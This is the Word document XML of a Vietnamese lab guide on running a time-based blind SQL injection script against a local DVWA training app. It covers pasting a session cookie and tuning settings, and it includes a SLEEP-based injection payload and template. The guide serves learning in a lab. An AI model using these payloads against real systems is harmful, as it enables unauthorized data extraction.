    <w:p w14:paraId="4B5FBD51" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD83B77" w14:textId="32EEA2AB" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D7183" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46670680" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF9E7C7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="746DDBE5" w14:textId="17BB7950" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>-Lấy PHPSESSID thay vào COOKIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD08CC8" w14:textId="0CF06BAC" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB1F1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E5F580F" wp14:editId="146D4CAE">
            <wp:extent cx="4641273" cy="3387733"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3175"/>
            <wp:docPr id="61846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7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5591" cy="339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782A" w14:textId="76FE9DDF" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB1F1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20FB726B" wp14:editId="696136D4">
            <wp:extent cx="3033023" cy="609653"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123837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02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5DB2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DAFDB1" w14:textId="0215196F" w:rsidR="00EB1F1B" w:rsidRDefault="00497D96" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00497D96">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7D5777" wp14:editId="3639BB3B">
            <wp:extent cx="2670718" cy="4509655"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="74944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33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0735" cy="45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FD76" w14:textId="6A1B4E3F" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Đây là kết quả nhận được khi chạy script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4303149B" w14:textId="0C1C74FE" w:rsidR="00E134B7" w:rsidRDefault="00E134B7" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00E134B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC0EA26" wp14:editId="67831E6A">
            <wp:extent cx="2223655" cy="3354265"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="3540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8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1304" cy="338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5A17" w14:textId="77777777" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4254C387" w14:textId="50024F3B" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lưu ý n</w:t>
      </w:r>
      <w:r w:rsidRPr="00497D96">
        <w:t>ếu không chạy được, chỉnh các phần này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA27C2" w14:textId="1CF5A4E9" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00497D96">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00497D96">
        <w:t>Trường hợp URL khác</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400577B1" w14:textId="4A99A01E" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00497D96">
        <w:t>URL = http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B4438" w14:textId="427B94EE" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hoặc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CFF0FD" w14:textId="01F3E93D" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00497D96">
        <w:t>URL = http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4108A4D4" w14:textId="2B4EB7E0" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00497D96">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00497D96">
        <w:t>Trường hợp payload không cần dấu '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239C1E59" w14:textId="5D0AF99C" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00497D96">
        <w:t>1 AND IF(1=1,SLEEP(3),0)-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121947FD" w14:textId="1FA71EBB" w:rsidR="00497D96" w:rsidRDefault="00497D96" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sửa: </w:t>
      </w:r>
      <w:r w:rsidRPr="00497D96">
        <w:t>INJECTION_TEMPLATE = "1 AND IF(({condition}), SLEEP({sleep}), 0)-- -"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D381BC8" w14:textId="77777777" w:rsidR="009069CD" w:rsidRDefault="009069CD" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6307E2A6" w14:textId="78BB8EB0" w:rsidR="009069CD" w:rsidRDefault="009069CD" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="009069CD">
        <w:t>Trường hợp request là POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F509C7" w14:textId="016F8996" w:rsidR="009069CD" w:rsidRDefault="009069CD" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="009069CD">
        <w:t>REQUEST_METHOD = "POST"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0753CB4A" w14:textId="77777777" w:rsidR="009069CD" w:rsidRDefault="009069CD" w:rsidP="00497D96">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104CDE9A" w14:textId="180A52DF" w:rsidR="009069CD" w:rsidRDefault="009069CD" w:rsidP="009069CD">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="009069CD">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009069CD">
        <w:t>Trường hợp mạng chậm hoặc timing sai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D80272F" w14:textId="4F2136C5" w:rsidR="009069CD" w:rsidRDefault="009069CD" w:rsidP="009069CD">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="009069CD">
        <w:t xml:space="preserve">SLEEP_TIME = </w:t>
      </w:r>
      <w:r w:rsidR="006D12F0">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="009069CD">
        <w:t xml:space="preserve">.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF8D514" w14:textId="17CDCEB8" w:rsidR="009069CD" w:rsidRPr="00497D96" w:rsidRDefault="009069CD" w:rsidP="009069CD">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="009069CD">
        <w:t>TIMEOUT = 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034304A8" w14:textId="77777777" w:rsidR="00497D96" w:rsidRPr="00EB1F1B" w:rsidRDefault="00497D96" w:rsidP="00EB1F1B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00497D96" w:rsidRPr="00EB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exend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31E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BFD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F87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42668D4C"/>
    <w:lvl w:ilvl="0" w:tplc="36FCC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77EA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACCA5C64"/>
    <w:lvl w:ilvl="0" w:tplc="8FD0BE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AB631A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE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068F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E5AE0D8"/>
    <w:lvl w:ilvl="0" w:tplc="14008E42"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E5B9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="828A66B8"/>
    <w:lvl w:ilvl="0" w:tplc="FA5EA2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17266"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89C273AE"/>
    <w:lvl w:ilvl="0" w:tplc="515A7310">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="72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F7090"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8403B36"/>
    <w:lvl w:ilvl="0" w:tplc="5832F330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37840"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DBC4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C21B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C7023EC"/>
    <w:lvl w:ilvl="0" w:tplc="D690FD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8724B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6102EB08"/>
    <w:lvl w:ilvl="0" w:tplc="0694B730">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="72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119E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C91A9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B741A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B10C9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8960C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86001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056BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FA67BAA"/>
    <w:lvl w:ilvl="0" w:tplc="DFA6A09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F02403"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60061A24"/>
    <w:lvl w:ilvl="0" w:tplc="430CADFE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B3146"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF7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A391A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FF29C24"/>
    <w:lvl w:ilvl="0" w:tplc="D778AA1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9406F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F85228EA"/>
    <w:lvl w:ilvl="0" w:tplc="C9960B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427A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F948E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90609"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73EA75A4"/>
    <w:lvl w:ilvl="0" w:tplc="8E605C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A47E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D81A1B54"/>
    <w:lvl w:ilvl="0" w:tplc="CDD6492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E469D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90C2F02A"/>
    <w:lvl w:ilvl="0" w:tplc="1382DE5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86B85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7E84AFE"/>
    <w:lvl w:ilvl="0" w:tplc="7AFED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C35BCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01AA4DD6"/>
    <w:lvl w:ilvl="0" w:tplc="8548C12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3016E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD3284D6"/>
    <w:lvl w:ilvl="0" w:tplc="5BCC169C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8A1BBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B41E8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351B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D97ADF74"/>
    <w:lvl w:ilvl="0" w:tplc="7CE4DE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1619">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1159036260">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="172915316">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2106530999">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="402916513">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="25374187">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="587272315">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1121802254">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1347632726">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2115973387">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="719523337">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="61954560">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1769887332">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="2114088511">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="990057227">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1697583206">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1295597640">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1479030287">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1276139484">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="573204229">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="647243357">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1482194107">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1974863360">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="2010327467">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="480735348">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="422341629">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1566067650">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="843016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E7D"/>
    <w:rsid w:val="00010424"/>
    <w:rsid w:val="0002163E"/>
    <w:rsid w:val="00036E4A"/>
    <w:rsid w:val="00040279"/>
    <w:rsid w:val="000707AD"/>
    <w:rsid w:val="0007619F"/>
    <w:rsid w:val="00093320"/>
    <w:rsid w:val="000964D1"/>
    <w:rsid w:val="00097483"/>
    <w:rsid w:val="000A674D"/>
    <w:rsid w:val="000B1B25"/>
    <w:rsid w:val="00102A69"/>
    <w:rsid w:val="001213B7"/>
    <w:rsid w:val="00143FA7"/>
    <w:rsid w:val="00144E09"/>
    <w:rsid w:val="001559A6"/>
    <w:rsid w:val="0016274A"/>
    <w:rsid w:val="001707D3"/>
    <w:rsid w:val="001820B0"/>
    <w:rsid w:val="00187AC2"/>
    <w:rsid w:val="001B3E98"/>
    <w:rsid w:val="001B5C1E"/>
    <w:rsid w:val="001B7FA3"/>
    <w:rsid w:val="001C2494"/>
    <w:rsid w:val="001C62FF"/>
    <w:rsid w:val="001D6B53"/>
    <w:rsid w:val="001F109F"/>
    <w:rsid w:val="001F69A1"/>
    <w:rsid w:val="002018E7"/>
    <w:rsid w:val="00207775"/>
    <w:rsid w:val="00211B64"/>
    <w:rsid w:val="00216784"/>
    <w:rsid w:val="002213F1"/>
    <w:rsid w:val="00227673"/>
    <w:rsid w:val="002374E6"/>
    <w:rsid w:val="00263189"/>
    <w:rsid w:val="00267E02"/>
    <w:rsid w:val="00274892"/>
    <w:rsid w:val="00285889"/>
    <w:rsid w:val="002903DB"/>
    <w:rsid w:val="00296B1F"/>
    <w:rsid w:val="002B2670"/>
    <w:rsid w:val="002C4EA8"/>
    <w:rsid w:val="002E321E"/>
    <w:rsid w:val="002F136C"/>
    <w:rsid w:val="003008C8"/>
    <w:rsid w:val="00304D22"/>
    <w:rsid w:val="00315FE1"/>
    <w:rsid w:val="00316165"/>
    <w:rsid w:val="00326901"/>
    <w:rsid w:val="00326CCD"/>
    <w:rsid w:val="003312D3"/>
    <w:rsid w:val="0035774D"/>
    <w:rsid w:val="00366EDD"/>
    <w:rsid w:val="0038550A"/>
    <w:rsid w:val="00396AC4"/>
    <w:rsid w:val="003A3BEC"/>
    <w:rsid w:val="003B13BB"/>
    <w:rsid w:val="003B7E89"/>
    <w:rsid w:val="003E51FD"/>
    <w:rsid w:val="003F3605"/>
    <w:rsid w:val="004134E1"/>
    <w:rsid w:val="004169D7"/>
    <w:rsid w:val="00421BA2"/>
    <w:rsid w:val="00433D6E"/>
    <w:rsid w:val="00444053"/>
    <w:rsid w:val="00451BD1"/>
    <w:rsid w:val="00465692"/>
    <w:rsid w:val="00481BBE"/>
    <w:rsid w:val="00483FDE"/>
    <w:rsid w:val="00497B56"/>
    <w:rsid w:val="00497D96"/>
    <w:rsid w:val="004C337E"/>
    <w:rsid w:val="004C44F3"/>
    <w:rsid w:val="004C4F25"/>
    <w:rsid w:val="004E4168"/>
    <w:rsid w:val="005064D1"/>
    <w:rsid w:val="005114DE"/>
    <w:rsid w:val="00516F64"/>
    <w:rsid w:val="00530884"/>
    <w:rsid w:val="005349A8"/>
    <w:rsid w:val="00541725"/>
    <w:rsid w:val="00546C74"/>
    <w:rsid w:val="00562580"/>
    <w:rsid w:val="00575948"/>
    <w:rsid w:val="00582299"/>
    <w:rsid w:val="00590456"/>
    <w:rsid w:val="00596867"/>
    <w:rsid w:val="00597B97"/>
    <w:rsid w:val="005A435F"/>
    <w:rsid w:val="005F4088"/>
    <w:rsid w:val="005F4D7B"/>
    <w:rsid w:val="00601A1E"/>
    <w:rsid w:val="006027F4"/>
    <w:rsid w:val="00611109"/>
    <w:rsid w:val="00631547"/>
    <w:rsid w:val="006404C7"/>
    <w:rsid w:val="00643BCB"/>
    <w:rsid w:val="00646930"/>
    <w:rsid w:val="00654559"/>
    <w:rsid w:val="00663889"/>
    <w:rsid w:val="00666D27"/>
    <w:rsid w:val="00694E1F"/>
    <w:rsid w:val="006960ED"/>
    <w:rsid w:val="006C011B"/>
    <w:rsid w:val="006C1557"/>
    <w:rsid w:val="006C1F08"/>
    <w:rsid w:val="006C2FCE"/>
    <w:rsid w:val="006D0844"/>
    <w:rsid w:val="006D12F0"/>
    <w:rsid w:val="006D3392"/>
    <w:rsid w:val="006D4DF0"/>
    <w:rsid w:val="00703AB1"/>
    <w:rsid w:val="00716C50"/>
    <w:rsid w:val="00717468"/>
    <w:rsid w:val="00721FBC"/>
    <w:rsid w:val="007229B4"/>
    <w:rsid w:val="00732297"/>
    <w:rsid w:val="00744A9E"/>
    <w:rsid w:val="00746109"/>
    <w:rsid w:val="00750DAB"/>
    <w:rsid w:val="007731CE"/>
    <w:rsid w:val="00777204"/>
    <w:rsid w:val="00792F2C"/>
    <w:rsid w:val="007B57C7"/>
    <w:rsid w:val="007E46D5"/>
    <w:rsid w:val="008011F2"/>
    <w:rsid w:val="00813D43"/>
    <w:rsid w:val="00834511"/>
    <w:rsid w:val="0083797E"/>
    <w:rsid w:val="008433D4"/>
    <w:rsid w:val="0085676E"/>
    <w:rsid w:val="00864AD1"/>
    <w:rsid w:val="00896D1F"/>
    <w:rsid w:val="008A04C2"/>
    <w:rsid w:val="008A0BC3"/>
    <w:rsid w:val="008B7346"/>
    <w:rsid w:val="008C5E23"/>
    <w:rsid w:val="008D02AA"/>
    <w:rsid w:val="008D30C2"/>
    <w:rsid w:val="008F2994"/>
    <w:rsid w:val="009069CD"/>
    <w:rsid w:val="00934D25"/>
    <w:rsid w:val="00937329"/>
    <w:rsid w:val="00946F45"/>
    <w:rsid w:val="00952DA7"/>
    <w:rsid w:val="009554D5"/>
    <w:rsid w:val="009646D6"/>
    <w:rsid w:val="00964A44"/>
    <w:rsid w:val="00965810"/>
    <w:rsid w:val="00981716"/>
    <w:rsid w:val="00984A55"/>
    <w:rsid w:val="00995C87"/>
    <w:rsid w:val="00996058"/>
    <w:rsid w:val="009B4733"/>
    <w:rsid w:val="009E0ADA"/>
    <w:rsid w:val="009E269B"/>
    <w:rsid w:val="009E2BD1"/>
    <w:rsid w:val="009E4F3C"/>
    <w:rsid w:val="009F3B7B"/>
    <w:rsid w:val="00A17FBC"/>
    <w:rsid w:val="00A22263"/>
    <w:rsid w:val="00A27305"/>
    <w:rsid w:val="00A30ABB"/>
    <w:rsid w:val="00A31685"/>
    <w:rsid w:val="00A3225B"/>
    <w:rsid w:val="00A37806"/>
    <w:rsid w:val="00A37813"/>
    <w:rsid w:val="00A403E7"/>
    <w:rsid w:val="00A44D78"/>
    <w:rsid w:val="00A83A41"/>
    <w:rsid w:val="00A8512D"/>
    <w:rsid w:val="00AA493A"/>
    <w:rsid w:val="00AB0E9D"/>
    <w:rsid w:val="00AD285A"/>
    <w:rsid w:val="00AD75F8"/>
    <w:rsid w:val="00AE1589"/>
    <w:rsid w:val="00B31F89"/>
    <w:rsid w:val="00B373B2"/>
    <w:rsid w:val="00B415D6"/>
    <w:rsid w:val="00B5742A"/>
    <w:rsid w:val="00B702EC"/>
    <w:rsid w:val="00B823ED"/>
    <w:rsid w:val="00B83B1A"/>
    <w:rsid w:val="00B87564"/>
    <w:rsid w:val="00B96459"/>
    <w:rsid w:val="00BA28B8"/>
    <w:rsid w:val="00BB04B0"/>
    <w:rsid w:val="00BB103A"/>
    <w:rsid w:val="00BD529F"/>
    <w:rsid w:val="00BE2751"/>
    <w:rsid w:val="00BE3B89"/>
    <w:rsid w:val="00BE775A"/>
    <w:rsid w:val="00C03626"/>
    <w:rsid w:val="00C1415E"/>
    <w:rsid w:val="00C4389C"/>
    <w:rsid w:val="00C60E7D"/>
    <w:rsid w:val="00C60FBC"/>
    <w:rsid w:val="00C7075B"/>
    <w:rsid w:val="00C70903"/>
    <w:rsid w:val="00C71022"/>
    <w:rsid w:val="00C978BF"/>
    <w:rsid w:val="00CB2592"/>
    <w:rsid w:val="00CD365B"/>
    <w:rsid w:val="00D41C48"/>
    <w:rsid w:val="00D53B09"/>
    <w:rsid w:val="00D549C2"/>
    <w:rsid w:val="00D72070"/>
    <w:rsid w:val="00D83B98"/>
    <w:rsid w:val="00D84CE4"/>
    <w:rsid w:val="00D94D2C"/>
    <w:rsid w:val="00DC2B5B"/>
    <w:rsid w:val="00DE21C2"/>
    <w:rsid w:val="00DE325F"/>
    <w:rsid w:val="00DE5AB9"/>
    <w:rsid w:val="00DE6378"/>
    <w:rsid w:val="00DE6A97"/>
    <w:rsid w:val="00DE7EE7"/>
    <w:rsid w:val="00E03DBE"/>
    <w:rsid w:val="00E134B7"/>
    <w:rsid w:val="00E31AAE"/>
    <w:rsid w:val="00E32986"/>
    <w:rsid w:val="00E32B6D"/>
    <w:rsid w:val="00E3423B"/>
    <w:rsid w:val="00E35B2F"/>
    <w:rsid w:val="00E3715A"/>
    <w:rsid w:val="00E400FC"/>
    <w:rsid w:val="00E47FDB"/>
    <w:rsid w:val="00E542D3"/>
    <w:rsid w:val="00E544F5"/>
    <w:rsid w:val="00E643AF"/>
    <w:rsid w:val="00E67022"/>
    <w:rsid w:val="00E76ABA"/>
    <w:rsid w:val="00E914BF"/>
    <w:rsid w:val="00EA25DC"/>
    <w:rsid w:val="00EA5C15"/>
    <w:rsid w:val="00EB1F1B"/>
    <w:rsid w:val="00EB4854"/>
    <w:rsid w:val="00EC6318"/>
    <w:rsid w:val="00ED0AE4"/>
    <w:rsid w:val="00EE2969"/>
    <w:rsid w:val="00F0542D"/>
    <w:rsid w:val="00F13ADA"/>
    <w:rsid w:val="00F14DF0"/>
    <w:rsid w:val="00F43520"/>
    <w:rsid w:val="00F441FC"/>
    <w:rsid w:val="00F451E6"/>
    <w:rsid w:val="00F509BE"/>
    <w:rsid w:val="00F57EAD"/>
    <w:rsid w:val="00F74226"/>
    <w:rsid w:val="00FA6CC9"/>
    <w:rsid w:val="00FB75AF"/>
    <w:rsid w:val="00FC7238"/>
    <w:rsid w:val="00FD24AD"/>
    <w:rsid w:val="00FD3200"/>
    <w:rsid w:val="00FE7A85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9000"/>
  <w15:docId w15:val="{6CA4E209-A514-42CD-A48D-D7D19135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next w:val="NoSpacing"/>
    <w:qFormat/>
    <w:rsid w:val="00E542D3"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Lexend" w:hAnsi="Lexen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2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104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C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4D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FA7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104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04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424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010424"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="w">
    <w:name w:val="w"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00010424"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="go">
    <w:name w:val="go"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00010424"/>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00516F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4D1"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:aliases w:val="mục la mã"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00211B64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mục la mã Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
